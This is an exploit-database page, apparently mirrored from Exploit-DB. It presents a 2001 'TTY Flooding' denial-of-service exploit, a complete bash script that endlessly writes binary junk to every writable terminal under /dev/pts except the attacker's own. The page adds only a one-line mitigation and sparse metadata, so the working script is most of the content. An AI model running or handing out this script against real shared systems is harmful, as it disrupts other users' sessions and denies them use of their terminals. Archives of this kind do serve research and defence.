header-logo
Suggest Exploit
vendor:
N/A
by:
teleh0r
7,5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2001

TTY Flooding

This exploit floods the TTYs of other users with nonsense data, causing a denial of service.

Mitigation:

Restrict access to the TTY directory and ensure that only authorized users can write to it.
Source

Exploit-DB raw data:

#!/bin/bash
#
# by teleh0r

TTYDIR=/dev/pts
NONSENSE=/bin/nice
MYTTY=`tty` # To prevent flooding of one's own TTY

while /bin/true ; do
    for i in $TTYDIR/* ; do
        if [ -w $i -a -c $i -a $i != $MYTTY ]; then
            cat $NONSENSE > $i
        fi
    done
done

unset i


# milw0rm.com [2001-01-02]

Navigation

Suggest Exploit

Services By CQR